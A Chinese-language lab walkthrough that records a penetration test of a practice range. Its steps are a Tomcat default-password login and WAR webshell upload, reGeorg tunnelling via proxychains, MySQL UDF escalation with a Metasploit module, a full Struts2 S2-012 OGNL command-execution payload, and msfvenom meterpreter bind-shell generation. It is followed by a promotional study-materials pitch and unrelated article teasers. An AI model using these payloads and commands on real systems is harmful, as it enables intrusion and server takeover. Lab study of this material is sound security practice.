靶场攻略 | 记一次实验靶场练习笔记前两天朋友分享了一个实验靶场感觉环境还不错于是对测试过程进行了详细记录靶场中涉及知识点总结如下War包制作regeorg内网代理工具的使用UDF漏洞利用Struts2-012漏洞利用Msfvenom模块的使用本次实验靶场的网络拓扑结构如下图所示01获取web据点首先访问朋友给定的web服务器端口为tomcat应用的默认页面如下图所示如果刚开始没有思路的话可以百度搜索一下Tomcat示例页面相关漏洞情况。访问目标manager后台目录尝试tomcat默认口令tomcat/tomcat进行登录登录成功之后tomcat管理后台有个部署war包的功能可以通过上传war包getshell获取服务器权限。在攻击机kali中生成war包后门可以用自己的木马也可使用kali自带webshell默认路径/usr/share/laudanum/jar cvf shell.war xx.jsp在WAR file to deploy 功能处上传并部署后门war包单击选择文件选择生成的war文件并确定点击击deploy按钮就完成了上传。验证是否上传成功浏览器访问注意事项根目录war包文件名jsp webshell文件名比如我上传了的war包名为cmd.war木马名为cmd.jsp在浏览器地址栏中hxxp://x.x.x.x/cmd/cmd.jsp接下是连接上传的jsp一句话使用C刀连接目标服务器的jsp木马下载地址https://github.com/Chora10/Cknife 可自行编译或者下载网上的程序虚拟机里执行。菜刀成功连接后会以树状形式显示webshell文件所处位置如下图所示02添加代理拿下web边界机以后一般情况下分两种情况有内网以此为跳板攻击内网其他机器摸清目标内网拓扑环境拿下靶标系统无内网如果是项目就可以收工了不是的话就可以作为代理池的一部分下面的情况属于有内网的环境查看本机IP地址发现两个网卡都有内网地址。目标web服务器并无探测主机存活的工具两种方式自己上传端口扫描工具||脚本使用隧道代理工具代理自己的工具进入目标内网中做初步的信息搜集。此处选择第二种方式上传regeorg程序的tunnel.jsp脚本到目标服务器的shell目录下web访问返回连接成功的信息(Georg says,’All seems fine’) 如下图所示此为该工具流量硬特征建议在下载后修改该字符串或者使用升级版的neo-regeorghttps://github.com/L-codes/Neo-reGeorg 去特征且传输加密使用regeorg工具建立隧道命令如下Python regeorgsocksproxy.py -u hxxp://x.x.x.x/tunnel.jsp -p xxxx-u 代理木马链接-p指定传输端口在proxychains工具配置文件下添加regeorg打通的代理端口vim /etc/proxychains.conf 在最后一行添加regeorg的配置好的传输端口即可代理nmap到内网扫描172网段敏感端口使用TCP全连接扫描一些Nmap使用语法http://mang0.me/archis/40a439a4/03UDF漏洞利用通过扫描得到的MySQL应用信息尝试弱口令连接一样的思路哪个应用不会搜索哪里查看security_file_priv是否配置命令:show variables like ‘%secure%’;显示结果对应解释Secure_file_privnull //不允许导入导出文件Secure_file_privD:/ //允许导入到指定目录Secure_file_priv‘’ //允许到任意目录Secure_file_priv”/” //允许到根目录发现为空可以写任意目录使用proxychains将msf代理到目标内网中利用MySQL的UDF漏洞进行命令执行。如果忘记模块可以先search 需要的模块内容关键字Use exploit/multi/mysql/mysql_udf_payload查看未设置的参数 show optionsPassword和rhost参数可以设置Set rhost 172.16.15.16Set password 123456 run虽然显示没有会话但是so文件已经传上去了使用默认的MySQL命令连接执行自定义函数成功执行说明udf提权成功。04S2-012漏洞利用代理nmap到内网扫描10网段机器敏感端口发现10.10.60.250:8080存在struts2-012漏洞Struts2-012 payload 测试%{ #a(new java.lang.ProcessBuilder(new java.lang.String[]{ls,-al})).redirectErrorStream(true).start(), #b#a.getInputStream(), #cnew java.io.InputStreamReader(#b), #dnew java.io.BufferedReader(#c), #enew char[50000], #d.read(#e), #f#context.get(com.opensymphony.xwork2.dispatcher.HttpServletResponse), #f.getWriter().println(new java.lang.String(#e)), #f.getWriter().flush(),#f.getWriter().close() }成功读取/etc/passwd文件10.10.60.66和172.16.15.16一样的思路。弱口令admin/password上传菜刀的jsp木马使用蚁剑服务器管理工具连接成功Msf生成Linux木马msfvenom -p linux/x86/meterpreter/bind_tcp rhost10.10.60.66 lport1234 -f elf shell.elf生成完成后将该木马程序上传到目标服务器的web目录下赋予权限在msf中开启监听模块执行程序即可拿到会话设置msf下handler模块必要的参数set payload linux/x86/meterpreter/bing_tcpSet rhost 10.10.60.66Set lport 1234exploit -j 后台获取会话Sessions 可查看会话 -i 进入该会话本次实验到此结束通过弱口令并结合应用特性拿到主机权限使用内网代理工具建立隧道探测内网段端口及对应漏洞拿下对应主机权限。如何系统学习网络安全网络安全作为数字时代的核心技术基石已成为保障各行业安全稳定运行的坚实屏障。筑牢网络安全的防线掌握先进的防护策略和技能正上升为国家与企业发展的战略优先级。构建稳固的网络安全能力是一个体系的工程需要从夯实基础理论出发持续深化到攻防对抗与应急响应的实战层面。如果你是准备学习网络安全黑客或者正在学习我可以把我自用的360独家内部资料分享给你包含以下内容你应该能用得上①网络安全学习路线②20份渗透测试电子书③安全攻防357页笔记④50份安全攻防面试指南⑤安全红队渗透工具包⑥网络安全必备书籍⑦100个漏洞实战案例⑧安全大厂内部视频资源⑨历年CTF夺旗赛题解析一、网络安全黑客学习路线网络安全黑客学习路线形成网络安全领域所有的知识点汇总它的用处就在于你可以按照上面的知识点去找对应的学习资源保证自己学得较为全面。二、网络安全教程视频我们在看视频学习的时候不能光动眼动脑不动手比较科学的学习方法是在理解之后运用它们这时候练手项目就很适合了。三、网络安全CTF实战案例光学理论是没用的要学会跟着一起敲要动手实操才能将自己的所学运用到实际当中去这里带来的是CTFSRC资料HW资料毕竟实战是检验真理的唯一标准嘛~四、网络安全面试题最后我们所有的作为都是为就业服务的所以关键的临门一脚就是咱们的面试题内容所以面试题板块是咱们不可或缺的部分这里我给大家准备的就是我在面试期间准备的资料。网安其实不难难的是坚持和相信自己我的经验是既然已经选定网安你就要相信它相信它能成为你日后进阶的高效渠道这样自己才会更有信念去学习才能在碰到困难的时候坚持下去。机会属于有准备的人这是一个实力的时代。人和人之间的差距不在于智商而在于如何利用业余时间只要你想学习什么时候开始都不晚不要担心这担心那你只需努力剩下的交给时间这份完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费】
企业数字化 ERP 产品动态
相关推荐
基于深度学习的人脸情绪识别系统:从数据到部署的完整指南 简介:这份资源是面向人工智能、深度学习方向的毕业设计与课程设计参考项目,聚焦人脸情绪识别这一细分课题,适合具备Python基础、希望理解CNN图像分类与实时人脸检测如何协同工作的学习者。压缩包共11个文件,约11.89MB,… · 2026/9/23 9:08:24
趣味文字动画开发一文搞懂 Canvas与CSS3实战对比 趣味文字动画开发一文搞懂 Canvas与CSS3实战对比 官方文档里关于字符渲染的章节动辄几百页,参数解释得云里雾里,新手根本抓不住重点。别被那些晦涩的术语吓退,今天我们用大白话把 趣味文字 的底层逻辑拆解清楚。… · 2026/9/23 9:08:17
昇腾Atlas 300V部署YOLOv5:从ONNX到OM的完整实战 拿到Atlas 300V 24G这张卡之后,我第一反应是查它到底算不算运算加速卡。毕竟包装上清清楚楚写着“AI加速卡”,可安装驱动的时候它既不吃CUDA,也不认cuDNN,和之前用N卡那套完全两个世界。等我把YOLOv5真正跑起来,才发现… · 2026/9/23 9:08:17
kustomize cfg list-setters 命令指南:列出资源配置中的所有 Setter kustomize cfg list-setters 命令指南:列出资源配置中的所有 Setter 【免费下载链接】kustomize Customization of kubernetes YAML configurations 项目地址: https://gitcode.com/gh_mirrors/ku/kustomize
本指南围绕 kustomize 的 kustomize cfg list-set… · 2026/9/23 9:53:31
Cgroup 原理与实战:从 CPU 内存限制到容器资源配额 1. 从一次线上事故说起:为什么每个后端人都该吃透 Cgroup去年冬天的一个凌晨,我被电话叫醒。一台跑了十几个微服务的宿主机,内存监控曲线像坐过山车一样冲顶,然后 OOM Killer 开始无差别扫射,把最核心的订单服务给干掉… · 2026/9/23 9:53:24
道德经第二十章拆解3个实战项目避坑指南 道德经第二十章拆解3个实战项目避坑指南 报错一堆看不懂 StackTrace,是不是让你抓狂?在微服务架构的 实战项目 里,这种堆栈信息就像天书。别慌,今天咱们聊聊《道德经第二十章》里的“众人熙熙,如享太牢,如春登台。我独泊兮,其未兆;如婴… · 2026/9/23 9:53:24
价值与价值观:面试必问的底层逻辑与代码实现 价值与价值观:面试必问的底层逻辑与代码实现 复制来的代码跑不通不知道怎么调?别急着改配置,先看看你的核心逻辑是不是写歪了。很多后端开发在应对【面试必问】的场景题时,往往卡在“如何量化业务价值”和“如何落地价值观约束”这两个点上。面试官问的不… · 2026/9/23 9:53:24
MATLAB小波分析在机械故障诊断中的实战应用 1. 项目背景与核心价值机械振动信号分析是工业设备状态监测与故障诊断的黄金标准。作为一名在旋转机械故障诊断领域工作8年的工程师,我深刻理解振动信号中蕴藏的设备健康信息就像一本加密的日记,而小波分析正是破解这本日记的密钥。传统傅里叶变换在分析… · 2026/9/23 9:53:18
储能系统SOC均衡与充电桩模拟技术解析 1. 储能系统的平衡艺术:从SOC均衡到充电桩模拟上周在调试一个光伏储能项目时,我遇到了一个典型问题:一组锂电池中总有那么几节"叛逆分子"充放电速度和其他成员不一致。这让我想起五年前参与的第一个储能项目,当时因为SO… · 2026/9/23 9:53:18
3招搞定手机怎么下载微信面试难题实战项目解析 3招搞定手机怎么下载微信面试难题实战项目解析 面试被问“手机怎么下载微信”背后的原理,90%的人答不上来。别笑,这看似弱智的问题,实则是考察你对移动应用分发机制、安全校验及网络协议理解的试金石。我带过不少校招新人,他们背了八股文,却连一个A… · 2026/9/23 0:00:03
你有新短消息请注意查收:3个新手避坑指南搞定消息系统选型 你有新短消息请注意查收:3个新手避坑指南搞定消息系统选型 面试被问“高并发下如何保证消息不丢失”,你张口就是“用Redis”,结果面试官追问“如果Redis宕机了怎么办”,你瞬间卡壳。这种场景太常见了,很多新手在背八股文时,只记住了技术名词… · 2026/9/23 0:00:29